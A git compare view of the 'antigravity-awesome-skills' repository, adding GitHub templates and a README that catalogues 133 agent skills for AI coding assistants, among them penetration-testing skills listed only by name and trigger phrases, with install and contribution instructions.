Compare commits
32 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
b5675d55ce | ||
|
|
6dcb7973ad | ||
|
|
9850b6b8e7 | ||
|
|
46d575b8d0 | ||
|
|
02fab354e0 | ||
|
|
226a7596cb | ||
|
|
11c16dbe27 | ||
|
|
95eeb1dd4b | ||
|
|
b1e4d61715 | ||
|
|
d17e7bc767 | ||
|
|
450a8a95a5 | ||
|
|
7a14904fd3 | ||
|
|
59a349075e | ||
|
|
d8b9ac19b2 | ||
|
|
68a457b96b | ||
|
|
98756d75ae | ||
|
|
4ee569d5d5 | ||
|
|
8a4b4383e8 | ||
|
|
9d09626fd2 | ||
|
|
014da3e744 | ||
|
|
113bc99e47 | ||
|
|
3e46a495c9 | ||
|
|
faf478f389 | ||
|
|
266cbf4c6c | ||
|
|
f8eaf7bd50 | ||
|
|
4dcd96e484 | ||
|
|
c86c93582e | ||
|
|
d32f89a211 | ||
|
|
1aa169c842 | ||
|
|
c9280cf9cf | ||
|
|
0fff14df81 | ||
|
|
8bd204708b |
8
.github/CODEOWNERS
vendored
Normal file
8
.github/CODEOWNERS
vendored
Normal file
@@ -0,0 +1,8 @@
|
||||
# Global owners
|
||||
* @sickn33
|
||||
|
||||
# Skills
|
||||
/skills/ @sickn33
|
||||
|
||||
# Documentation
|
||||
*.md @sickn33
|
||||
33
.github/ISSUE_TEMPLATE/bug_report.md
vendored
Normal file
33
.github/ISSUE_TEMPLATE/bug_report.md
vendored
Normal file
@@ -0,0 +1,33 @@
|
||||
---
|
||||
name: Bug Report
|
||||
about: Create a report to help us improve the skills
|
||||
title: "[BUG] "
|
||||
labels: bug
|
||||
assignees: sickn33
|
||||
---
|
||||
|
||||
**Describe the bug**
|
||||
A clear and concise description of what the bug is.
|
||||
|
||||
**To Reproduce**
|
||||
Steps to reproduce the behavior:
|
||||
|
||||
1. Go to '...'
|
||||
2. Click on '...'
|
||||
3. Scroll down to '...'
|
||||
4. See error
|
||||
|
||||
**Expected behavior**
|
||||
A clear and concise description of what you expected to happen.
|
||||
|
||||
**Screenshots**
|
||||
If applicable, add screenshots to help explain your problem.
|
||||
|
||||
**Environment (please complete the following information):**
|
||||
|
||||
- OS: [e.g. macOS, Windows]
|
||||
- Tool: [e.g. Claude Code, Antigravity]
|
||||
- Version [if known]
|
||||
|
||||
**Additional context**
|
||||
Add any other context about the problem here.
|
||||
19
.github/ISSUE_TEMPLATE/feature_request.md
vendored
Normal file
19
.github/ISSUE_TEMPLATE/feature_request.md
vendored
Normal file
@@ -0,0 +1,19 @@
|
||||
---
|
||||
name: Skill Request
|
||||
about: Suggest a new skill for the collection
|
||||
title: "[REQ] "
|
||||
labels: enhancement
|
||||
assignees: sickn33
|
||||
---
|
||||
|
||||
**Is your feature request related to a problem? Please describe.**
|
||||
A clear and concise description of what the problem is. Ex: I'm always frustrated when [...]
|
||||
|
||||
**Describe the solution you'd like**
|
||||
A description of the skill you want. What trigger should it have? What files should it effect?
|
||||
|
||||
**Describe alternatives you've considered**
|
||||
A clear and concise description of any alternative solutions or features you've considered.
|
||||
|
||||
**Additional context**
|
||||
Add any other context or screenshots about the feature request here.
|
||||
18
.github/PULL_REQUEST_TEMPLATE.md
vendored
Normal file
18
.github/PULL_REQUEST_TEMPLATE.md
vendored
Normal file
@@ -0,0 +1,18 @@
|
||||
## Description
|
||||
|
||||
Please describe your changes. What skill are you adding or modifying?
|
||||
|
||||
## Checklist
|
||||
|
||||
- [ ] My skill follows the [creation guidelines](https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/skill-creator)
|
||||
- [ ] I have run `validate_skills.py`
|
||||
- [ ] I have added my name to the credits (if applicable)
|
||||
|
||||
## Type of Change
|
||||
|
||||
- [ ] New Skill
|
||||
- [ ] Bug Fix
|
||||
- [ ] Documentation Update
|
||||
- [ ] Infrastructure
|
||||
|
||||
## Screenshots (if applicable)
|
||||
6
.gitignore
vendored
Normal file
6
.gitignore
vendored
Normal file
@@ -0,0 +1,6 @@
|
||||
|
||||
MAINTENANCE.md
|
||||
walkthrough.md
|
||||
.agent/rules/
|
||||
.gemini/
|
||||
LOCAL_CONFIG.md
|
||||
275
README.md
275
README.md
@@ -1,62 +1,277 @@
|
||||
# 🌌 Antigravity Awesome Skills
|
||||
# 🌌 Antigravity Awesome Skills: 133+ Agentic Skills for Claude Code, Gemini CLI, Cursor, Copilot & More
|
||||
|
||||
> **The Ultimate Collection of 50+ Agentic Skills for Claude Code (Antigravity)**
|
||||
> **The Ultimate Collection of 133+ Universal Agentic Skills for AI Coding Assistants — Claude Code, Gemini CLI, Codex CLI, Antigravity IDE, GitHub Copilot, Cursor, OpenCode**
|
||||
|
||||
[](https://opensource.org/licenses/MIT)
|
||||
[](https://claude.ai)
|
||||
[](https://github.com/guanyang/antigravity-skills)
|
||||
[](https://claude.ai)
|
||||
[](https://github.com/google-gemini/gemini-cli)
|
||||
[](https://github.com/openai/codex)
|
||||
[](https://cursor.sh)
|
||||
[](https://github.com/features/copilot)
|
||||
[](https://github.com/opencode-ai/opencode)
|
||||
[](https://github.com/anthropics/antigravity)
|
||||
|
||||
**Antigravity Awesome Skills** is a curated, battle-tested collection of **58 high-performance skills** designed to supercharge your Claude Code agent using the Antigravity framework.
|
||||
**Antigravity Awesome Skills** is a curated, battle-tested library of **133 high-performance agentic skills** designed to work seamlessly across all major AI coding assistants:
|
||||
|
||||
- 🟣 **Claude Code** (Anthropic CLI)
|
||||
- 🔵 **Gemini CLI** (Google DeepMind)
|
||||
- 🟢 **Codex CLI** (OpenAI)
|
||||
- 🔴 **Antigravity IDE** (Google DeepMind)
|
||||
- 🩵 **GitHub Copilot** (VSCode Extension)
|
||||
- 🟠 **Cursor** (AI-native IDE)
|
||||
- ⚪ **OpenCode** (Open-source CLI)
|
||||
|
||||
This repository provides essential skills to transform your AI assistant into a **full-stack digital agency**, including official capabilities from **Anthropic**, **OpenAI**, **Google**, and **Vercel Labs**.
|
||||
|
||||
## 📍 Table of Contents
|
||||
|
||||
- [🔌 Compatibility](#-compatibility)
|
||||
- [Features & Categories](#features--categories)
|
||||
- [Full Skill Registry](#full-skill-registry-133133)
|
||||
- [Installation](#installation)
|
||||
- [How to Contribute](#how-to-contribute)
|
||||
- [Credits & Sources](#credits--sources)
|
||||
- [License](#license)
|
||||
|
||||
---
|
||||
|
||||
## 🔌 Compatibility
|
||||
|
||||
These skills follow the universal **SKILL.md** format and work with any AI coding assistant that supports agentic skills:
|
||||
|
||||
| Tool | Type | Compatibility | Installation Path |
|
||||
| ------------------- | --------- | ------------- | ---------------------------------------- |
|
||||
| **Claude Code** | CLI | ✅ Full | `.claude/skills/` or `.agent/skills/` |
|
||||
| **Gemini CLI** | CLI | ✅ Full | `.gemini/skills/` or `.agent/skills/` |
|
||||
| **Codex CLI** | CLI | ✅ Full | `.codex/skills/` or `.agent/skills/` |
|
||||
| **Antigravity IDE** | IDE | ✅ Full | `.agent/skills/` |
|
||||
| **Cursor** | IDE | ✅ Full | `.cursor/skills/` or project root |
|
||||
| **GitHub Copilot** | Extension | ⚠️ Partial | Copy skill content to `.github/copilot/` |
|
||||
| **OpenCode** | CLI | ✅ Full | `.opencode/skills/` or `.agent/skills/` |
|
||||
|
||||
> [!TIP]
|
||||
> Most tools auto-discover skills in `.agent/skills/`. For maximum compatibility, clone to this directory.
|
||||
|
||||
---
|
||||
|
||||
Whether you are using **Gemini CLI**, **Claude Code**, **Codex CLI**, **Cursor**, **GitHub Copilot**, **Antigravity**, or **OpenCode**, these skills are designed to drop right in and supercharge your AI agent.
|
||||
|
||||
This repository aggregates the best capabilities from across the open-source community, transforming your AI assistant into a full-stack digital agency capable of Engineering, Design, Security, Marketing, and Autonomous Operations.
|
||||
|
||||
## 🚀 Features & Categories
|
||||
## Features & Categories
|
||||
|
||||
- **🎨 Creative & Design**: Algorithmic art, Canvas design, Professional UI/UX, Design Systems.
|
||||
- **🛠️ Development & Engineering**: TDD, Clean Architecture, Playwright E2E Testing, Systematic Debugging.
|
||||
- **🛡️ Cybersecurity & Auditing**: Ethical Hacking, OWASP Audits, AWS Penetration Testing, SecOps.
|
||||
- **🛸 Autonomous Agents**: Loki Mode (Startup-in-a-box), Subagent Orchestration.
|
||||
- **📈 Business & Strategy**: Product Management (PRD/RICE), Marketing Strategy (SEO/ASO), Senior Architecture.
|
||||
- **🏗️ Infrastructure**: Backend/Frontend Guidelines, Docker, Git Workflows.
|
||||
The repository is organized into several key areas of expertise:
|
||||
|
||||
| Category | Skills Count | Key Skills Included |
|
||||
| :-------------------------- | :----------- | :--------------------------------------------------------------------------------------------------------------------------- |
|
||||
| **🛡️ Cybersecurity** | **~50** | Ethical Hacking, Metasploit, Burp Suite, SQLMap, Active Directory, AWS/Cloud Pentesting, OWASP Top 100, Red Team Tools |
|
||||
| **🛠️ Development** | **~25** | TDD, Systematic Debugging, React Patterns, Backend/Frontend Guidelines, Senior Fullstack, Software Architecture |
|
||||
| **🎨 Creative & Design** | **~10** | UI/UX Pro Max, Frontend Design, Canvas, Algorithmic Art, Theme Factory, D3 Viz, Web Artifacts |
|
||||
| **🤖 AI & LLM Development** | **~8** | LLM App Patterns, Autonomous Agent Patterns, Prompt Engineering, Prompt Library, JavaScript Mastery, Bun Development |
|
||||
| **🛸 Autonomous & Agentic** | **~8** | Loki Mode (Startup-in-a-box), Subagent Driven Dev, Dispatching Parallel Agents, Planning With Files, Skill Creator/Developer |
|
||||
| **📄 Document Processing** | **~4** | DOCX (Official), PDF (Official), PPTX (Official), XLSX (Official) |
|
||||
| **📈 Product & Strategy** | **~8** | Product Manager Toolkit, Content Creator, ASO, Doc Co-authoring, Brainstorming, Internal Comms |
|
||||
| **🏗️ Infrastructure & Git** | **~8** | Linux Shell Scripting, Git Worktrees, Git Pushing, Conventional Commits, File Organization, GitHub Workflow Automation |
|
||||
| **🔄 Workflow & Planning** | **~6** | Writing Plans, Executing Plans, Concise Planning, Verification Before Completion, Code Review (Requesting/Receiving) |
|
||||
| **🧪 Testing & QA** | **~4** | Webapp Testing, Playwright Automation, Test Fixing, Testing Patterns |
|
||||
|
||||
---
|
||||
|
||||
## 📦 Installation
|
||||
## Full Skill Registry (133/133)
|
||||
|
||||
To use these skills with **Antigravity** or **Claude Code**, clone this repository into your agent's skills directory:
|
||||
Below is the complete list of available skills. Each skill folder contains a `SKILL.md` that can be imported into Antigravity or Claude Code.
|
||||
|
||||
> [!NOTE] > **Document Skills**: We provide both **community** and **official Anthropic** versions for DOCX, PDF, PPTX, and XLSX. Locally, the official versions are used by default (via symlinks). In the repository, both versions are available for flexibility.
|
||||
|
||||
| Skill Name | Description | Path |
|
||||
| :-------------------------------------------------- | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :-------------------------------------- |
|
||||
| **API Fuzzing for Bug Bounty** | This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques. | `skills/api-fuzzing-bug-bounty` |
|
||||
| **AWS Penetration Testing** | This skill should be used when the user asks to "pentest AWS", "test AWS security", "enumerate IAM", "exploit cloud infrastructure", "AWS privilege escalation", "S3 bucket testing", "metadata SSRF", "Lambda exploitation", or needs guidance on Amazon Web Services security assessment. | `skills/aws-penetration-testing` |
|
||||
| **Active Directory Attacks** | This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing. | `skills/active-directory-attacks` |
|
||||
| **Address GitHub Comments** | Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI. | `skills/address-github-comments` |
|
||||
| **Agent Manager Skill** | Use when you need to manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling. | `skills/agent-manager-skill` |
|
||||
| **Algorithmic Art** | Creating algorithmic art using p5. | `skills/algorithmic-art` |
|
||||
| **App Store Optimization** | Complete App Store Optimization (ASO) toolkit for researching, optimizing, and tracking mobile app performance on Apple App Store and Google Play Store. | `skills/app-store-optimization` |
|
||||
| **Autonomous Agent Patterns** | "Design patterns for building autonomous coding agents. | `skills/autonomous-agent-patterns` |
|
||||
| **Backend Guidelines** | Comprehensive backend development guide for Node. | `skills/backend-dev-guidelines` |
|
||||
| **Brainstorming** | "You MUST use this before any creative work - creating features, building components, adding functionality, or modifying behavior. | `skills/brainstorming` |
|
||||
| **BlockRun** | Agent wallet for LLM micropayments. Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models ("blockrun", "use grok", "use gpt", "dall-e", "deepseek"). | `skills/blockrun` |
|
||||
| **Brand Guidelines (Anthropic)** | Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. | `skills/brand-guidelines-anthropic` |
|
||||
| **Brand Guidelines (Community)** | Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. | `skills/brand-guidelines-community` |
|
||||
| **Broken Authentication Testing** | This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". | `skills/broken-authentication` |
|
||||
| **Bun Development** | "Modern JavaScript/TypeScript development with Bun runtime. | `skills/bun-development` |
|
||||
| **Burp Suite Web Application Testing** | This skill should be used when the user asks to "intercept HTTP traffic", "modify web requests", "use Burp Suite for testing", "perform web vulnerability scanning", "test with Burp Repeater", "analyze HTTP history", or "configure proxy for web testing". | `skills/burp-suite-testing` |
|
||||
| **Canvas Design** | Create beautiful visual art in . | `skills/canvas-design` |
|
||||
| **Claude Code Guide** | Master guide for using Claude Code effectively. | `skills/claude-code-guide` |
|
||||
| **Claude D3.js** | Creating interactive data visualisations using d3. | `skills/claude-d3js-skill` |
|
||||
| **Cloud Penetration Testing** | This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". | `skills/cloud-penetration-testing` |
|
||||
| **Concise Planning** | Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist. | `skills/concise-planning` |
|
||||
| **Content Creator** | Create SEO-optimized marketing content with consistent brand voice. | `skills/content-creator` |
|
||||
| **Core Components** | Core component library and design system patterns. | `skills/core-components` |
|
||||
| **Cross-Site Scripting and HTML Injection Testing** | This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". | `skills/xss-html-injection` |
|
||||
| **Dispatching Parallel Agents** | Use when facing 2+ independent tasks that can be worked on without shared state or sequential dependencies. | `skills/dispatching-parallel-agents` |
|
||||
| **Doc Co-authoring** | Guide users through a structured workflow for co-authoring documentation. | `skills/doc-coauthoring` |
|
||||
| **DOCX (Official)** | "Comprehensive document creation, editing, and analysis with support for tracked changes, comments, formatting preservation, and text extraction. | `skills/docx-official` |
|
||||
| **Ethical Hacking Methodology** | This skill should be used when the user asks to "learn ethical hacking", "understand penetration testing lifecycle", "perform reconnaissance", "conduct security scanning", "exploit vulnerabilities", or "write penetration test reports". | `skills/ethical-hacking-methodology` |
|
||||
| **Executing Plans** | Use when you have a written implementation plan to execute in a separate session with review checkpoints. | `skills/executing-plans` |
|
||||
| **File Organizer** | Intelligently organizes files and folders by understanding context, finding duplicates, and suggesting better organizational structures. | `skills/file-organizer` |
|
||||
| **File Path Traversal Testing** | This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". | `skills/file-path-traversal` |
|
||||
| **Finishing Dev Branch** | Use when implementation is complete, all tests pass, and you need to decide how to integrate the work - guides completion of development work by presenting structured options for merge, PR, or cleanup. | `skills/finishing-a-development-branch` |
|
||||
| **Frontend Design** | Create distinctive, production-grade frontend interfaces with high design quality. | `skills/frontend-design` |
|
||||
| **Frontend Guidelines** | Frontend development guidelines for React/TypeScript applications. | `skills/frontend-dev-guidelines` |
|
||||
| **Git Pushing** | Stage, commit, and push git changes with conventional commit messages. | `skills/git-pushing` |
|
||||
| **GitHub Workflow Automation** | "Automate GitHub workflows with AI assistance. | `skills/github-workflow-automation` |
|
||||
| **HTML Injection Testing** | This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection vulnerabilities". | `skills/html-injection-testing` |
|
||||
| **IDOR Vulnerability Testing** | This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data. | `skills/idor-testing` |
|
||||
| **Internal Comms (Anthropic)** | A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. | `skills/internal-comms-anthropic` |
|
||||
| **Internal Comms (Community)** | A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. | `skills/internal-comms-community` |
|
||||
| **JavaScript Mastery** | "Comprehensive JavaScript reference covering 33+ essential concepts every developer should know. | `skills/javascript-mastery` |
|
||||
| **Kaizen** | Guide for continuous improvement, error proofing, and standardization. | `skills/kaizen` |
|
||||
| **Linux Privilege Escalation** | This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". | `skills/linux-privilege-escalation` |
|
||||
| **Linux Shell Scripting** | This skill should be used when the user asks to "create bash scripts", "automate Linux tasks", "monitor system resources", "backup files", "manage users", or "write production shell scripts". | `skills/linux-shell-scripting` |
|
||||
| **LLM App Patterns** | "Production-ready patterns for building LLM applications. | `skills/llm-app-patterns` |
|
||||
| **Loki Mode** | Multi-agent autonomous startup system for Claude Code. | `skills/loki-mode` |
|
||||
| **MCP Builder** | Guide for creating high-quality MCP (Model Context Protocol) servers that enable LLMs to interact with external services through well-designed tools. | `skills/mcp-builder` |
|
||||
| **Metasploit Framework** | This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". | `skills/metasploit-framework` |
|
||||
| **Network 101** | This skill should be used when the user asks to "set up a web server", "configure HTTP or HTTPS", "perform SNMP enumeration", "configure SMB shares", "test network services", or needs guidance on configuring and testing network services for penetration testing labs. | `skills/network-101` |
|
||||
| **NotebookLM** | Use this skill to query your Google NotebookLM notebooks directly from Claude Code for source-grounded, citation-backed answers from Gemini. | `skills/notebooklm` |
|
||||
| **PDF (Official)** | Comprehensive PDF manipulation toolkit for extracting text and tables, creating new PDFs, merging/splitting documents, and handling forms. | `skills/pdf-official` |
|
||||
| **Pentest Checklist** | This skill should be used when the user asks to "plan a penetration test", "create a security assessment checklist", "prepare for penetration testing", "define pentest scope", "follow security testing best practices", or needs a structured methodology for penetration testing engagements. | `skills/pentest-checklist` |
|
||||
| **Pentest Commands** | This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references. | `skills/pentest-commands` |
|
||||
| **Planning With Files** | Implements Manus-style file-based planning for complex tasks. | `skills/planning-with-files` |
|
||||
| **Playwright Automation** | Complete browser automation with Playwright. | `skills/playwright-skill` |
|
||||
| **PPTX (Official)** | "Presentation creation, editing, and analysis. | `skills/pptx-official` |
|
||||
| **Privilege Escalation Methods** | This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems. | `skills/privilege-escalation-methods` |
|
||||
| **Product Toolkit** | Comprehensive toolkit for product managers including RICE prioritization, customer interview analysis, PRD templates, discovery frameworks, and go-to-market strategies. | `skills/product-manager-toolkit` |
|
||||
| **Prompt Engineering** | Expert guide on prompt engineering patterns, best practices, and optimization techniques. | `skills/prompt-engineering` |
|
||||
| **Prompt Library** | "Curated collection of high-quality prompts for various use cases. | `skills/prompt-library` |
|
||||
| **React Best Practices** | React and Next. | `skills/react-best-practices` |
|
||||
| **React UI Patterns** | Modern React UI patterns for loading states, error handling, and data fetching. | `skills/react-ui-patterns` |
|
||||
| **Receiving Code Review** | Use when receiving code review feedback, before implementing suggestions, especially if feedback seems unclear or technically questionable - requires technical rigor and verification, not performative agreement or blind implementation. | `skills/receiving-code-review` |
|
||||
| **Red Team Tools and Methodology** | This skill should be used when the user asks to "follow red team methodology", "perform bug bounty hunting", "automate reconnaissance", "hunt for XSS vulnerabilities", "enumerate subdomains", or needs security researcher techniques and tool configurations from top bug bounty hunters. | `skills/red-team-tools` |
|
||||
| **Requesting Code Review** | Use when completing tasks, implementing major features, or before merging to verify work meets requirements. | `skills/requesting-code-review` |
|
||||
| **SMTP Penetration Testing** | This skill should be used when the user asks to "perform SMTP penetration testing", "enumerate email users", "test for open mail relays", "grab SMTP banners", "brute force email credentials", or "assess mail server security". | `skills/smtp-penetration-testing` |
|
||||
| **SQL Injection Testing** | This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". | `skills/sql-injection-testing` |
|
||||
| **SQLMap Database Penetration Testing** | This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing. | `skills/sqlmap-database-pentesting` |
|
||||
| **SSH Penetration Testing** | This skill should be used when the user asks to "pentest SSH services", "enumerate SSH configurations", "brute force SSH credentials", "exploit SSH vulnerabilities", "perform SSH tunneling", or "audit SSH security". | `skills/ssh-penetration-testing` |
|
||||
| **Security Scanning Tools** | This skill should be used when the user asks to "perform vulnerability scanning", "scan networks for open ports", "assess web application security", "scan wireless networks", "detect malware", "check cloud security", or "evaluate system compliance". | `skills/scanning-tools` |
|
||||
| **Senior Architect** | Comprehensive software architecture skill for designing scalable, maintainable systems using ReactJS, NextJS, NodeJS, Express, React Native, Swift, Kotlin, Flutter, Postgres, GraphQL, Go, Python. | `skills/senior-architect` |
|
||||
| **Senior Fullstack** | Comprehensive fullstack development skill for building complete web applications with React, Next. | `skills/senior-fullstack` |
|
||||
| **Shodan Reconnaissance and Pentesting** | This skill should be used when the user asks to "search for exposed devices on the internet," "perform Shodan reconnaissance," "find vulnerable services using Shodan," "scan IP ranges with Shodan," or "discover IoT devices and open ports. | `skills/shodan-reconnaissance` |
|
||||
| **Shopify Development** | Build Shopify apps, extensions, themes using GraphQL Admin API, Shopify CLI, Polaris UI, and Liquid. Use when user asks about "shopify app", "checkout extension", "shopify theme", "liquid template", "polaris", "shopify graphql", "shopify webhook", or "metafields". | `skills/shopify-development` |
|
||||
| **Skill Creator** | Guide for creating effective skills. | `skills/skill-creator` |
|
||||
| **Skill Developer** | Create and manage Claude Code skills following Anthropic best practices. | `skills/skill-developer` |
|
||||
| **Slack GIF Creator** | Knowledge and utilities for creating animated GIFs optimized for Slack. | `skills/slack-gif-creator` |
|
||||
| **Software Architecture** | Guide for quality focused software architecture. | `skills/software-architecture` |
|
||||
| **Subagent Driven Dev** | Use when executing implementation plans with independent tasks in the current session. | `skills/subagent-driven-development` |
|
||||
| **Systematic Debugging** | Use when encountering any bug, test failure, or unexpected behavior, before proposing fixes. | `skills/systematic-debugging` |
|
||||
| **TDD** | Use when implementing any feature or bugfix, before writing implementation code. | `skills/test-driven-development` |
|
||||
| **Test Fixing** | Run tests and systematically fix all failing tests using smart error grouping. | `skills/test-fixing` |
|
||||
| **Testing Patterns** | Jest testing patterns, factory functions, mocking strategies, and TDD workflow. | `skills/testing-patterns` |
|
||||
| **Theme Factory** | Toolkit for styling artifacts with a theme. | `skills/theme-factory` |
|
||||
| **Top 100 Vulnerabilities** | This skill should be used when the user asks to "identify web application vulnerabilities", "explain common security flaws", "understand vulnerability categories", "learn about injection attacks", "review access control weaknesses", "analyze API security issues", "assess security misconfigurations", "understand client-side vulnerabilities", "examine mobile and IoT security flaws", or "reference the OWASP-aligned vulnerability taxonomy". | `skills/top-web-vulnerabilities` |
|
||||
| **UI/UX Pro Max** | "UI/UX design intelligence. | `skills/ui-ux-pro-max` |
|
||||
| **Using Git Worktrees** | Use when starting feature work that needs isolation from current workspace or before executing implementation plans - creates isolated git worktrees with smart directory selection and safety verification. | `skills/using-git-worktrees` |
|
||||
| **Using Superpowers** | Use when starting any conversation - establishes how to find and use skills, requiring Skill tool invocation before ANY response including clarifying questions. | `skills/using-superpowers` |
|
||||
| **Verification Before Completion** | Use when about to claim work is complete, fixed, or passing, before committing or creating PRs - requires running verification commands and confirming output before making any success claims; evidence before assertions always. | `skills/verification-before-completion` |
|
||||
| **Web Artifacts** | Suite of tools for creating elaborate, multi-component claude. | `skills/web-artifacts-builder` |
|
||||
| **Web Design Guidelines** | Review UI code for Web Interface Guidelines compliance. | `skills/web-design-guidelines` |
|
||||
| **Webapp Testing** | Toolkit for interacting with and testing local web applications using Playwright. | `skills/webapp-testing` |
|
||||
| **Windows Privilege Escalation** | This skill should be used when the user asks to "escalate privileges on Windows," "find Windows privesc vectors," "enumerate Windows for privilege escalation," "exploit Windows misconfigurations," or "perform post-exploitation privilege escalation. | `skills/windows-privilege-escalation` |
|
||||
| **Wireshark Network Traffic Analysis** | This skill should be used when the user asks to "analyze network traffic with Wireshark", "capture packets for troubleshooting", "filter PCAP files", "follow TCP/UDP streams", "detect network anomalies", "investigate suspicious traffic", or "perform protocol analysis". | `skills/wireshark-analysis` |
|
||||
| **Workflow Automation** | "Design and implement automated workflows combining visual logic with custom code. | `skills/workflow-automation` |
|
||||
| **WordPress Penetration Testing** | This skill should be used when the user asks to "pentest WordPress sites", "scan WordPress for vulnerabilities", "enumerate WordPress users, themes, or plugins", "exploit WordPress vulnerabilities", or "use WPScan". | `skills/wordpress-penetration-testing` |
|
||||
| **Writing Plans** | Use when you have a spec or requirements for a multi-step task, before touching code. | `skills/writing-plans` |
|
||||
| **Writing Skills** | Use when creating new skills, editing existing skills, or verifying skills work before deployment. | `skills/writing-skills` |
|
||||
| **XLSX (Official)** | "Comprehensive spreadsheet creation, editing, and analysis with support for formulas, formatting, data analysis, and visualization. | `skills/xlsx-official` |
|
||||
|
||||
> [!TIP]
|
||||
> Use the `validate_skills.py` script in the `scripts/` directory to ensure all skills are properly formatted and ready for use.
|
||||
|
||||
---
|
||||
|
||||
## Installation
|
||||
|
||||
To use these skills with **Claude Code**, **Gemini CLI**, **Codex CLI**, **Cursor**, **Antigravity**, or **OpenCode**, clone this repository into your agent's skills directory:
|
||||
|
||||
```bash
|
||||
# Clone directly into your skills folder
|
||||
# Universal installation (works with most tools)
|
||||
git clone https://github.com/sickn33/antigravity-awesome-skills.git .agent/skills
|
||||
|
||||
# Claude Code specific
|
||||
git clone https://github.com/sickn33/antigravity-awesome-skills.git .claude/skills
|
||||
|
||||
# Gemini CLI specific
|
||||
git clone https://github.com/sickn33/antigravity-awesome-skills.git .gemini/skills
|
||||
|
||||
# Cursor specific
|
||||
git clone https://github.com/sickn33/antigravity-awesome-skills.git .cursor/skills
|
||||
```
|
||||
|
||||
Or copy valid markdown files (`SKILL.md`) to your existing configuration.
|
||||
---
|
||||
|
||||
## How to Contribute
|
||||
|
||||
We welcome contributions from the community! To add a new skill:
|
||||
|
||||
1. **Fork** the repository.
|
||||
2. **Create a new directory** inside `skills/` for your skill.
|
||||
3. **Add a `SKILL.md`** with the required frontmatter (name and description).
|
||||
4. **Run validation**: `python3 scripts/validate_skills.py`.
|
||||
5. **Submit a Pull Request**.
|
||||
|
||||
Please ensure your skill follows the Antigravity/Claude Code best practices.
|
||||
|
||||
---
|
||||
|
||||
## 🏆 Credits & Sources
|
||||
## Credits & Sources
|
||||
|
||||
This collection would not be possible without the incredible work of the Claude Code community. This repository is an aggregation of the following open-source projects:
|
||||
This collection would not be possible without the incredible work of the Claude Code community and official sources:
|
||||
|
||||
### 🌟 Core Foundation
|
||||
### Official Sources
|
||||
|
||||
- **[guanyang/antigravity-skills](https://github.com/guanyang/antigravity-skills)**: The original framework and core set of 33 skills.
|
||||
- **[anthropics/skills](https://github.com/anthropics/skills)**: Official Anthropic skills repository - Document manipulation (DOCX, PDF, PPTX, XLSX), Brand Guidelines, Internal Communications.
|
||||
- **[anthropics/claude-cookbooks](https://github.com/anthropics/claude-cookbooks)**: Official notebooks and recipes for building with Claude.
|
||||
- **[vercel-labs/agent-skills](https://github.com/vercel-labs/agent-skills)**: Vercel Labs official skills - React Best Practices, Web Design Guidelines.
|
||||
- **[openai/skills](https://github.com/openai/skills)**: OpenAI Codex skills catalog - Agent skills, Skill Creator, Concise Planning.
|
||||
|
||||
### 👥 Community Contributors
|
||||
### Community Contributors
|
||||
|
||||
- **[diet103/claude-code-infrastructure-showcase](https://github.com/diet103/claude-code-infrastructure-showcase)**: Infrastructure, Backend/Frontend Guidelines, and Skill Development meta-skills.
|
||||
- **[ChrisWiles/claude-code-showcase](https://github.com/ChrisWiles/claude-code-showcase)**: React UI patterns, Design System components, and Testing factories.
|
||||
- **[travisvn/awesome-claude-skills](https://github.com/travisvn/awesome-claude-skills)**: Autonomous agents (Loki Mode), Playwright integration, and D3.js visualization.
|
||||
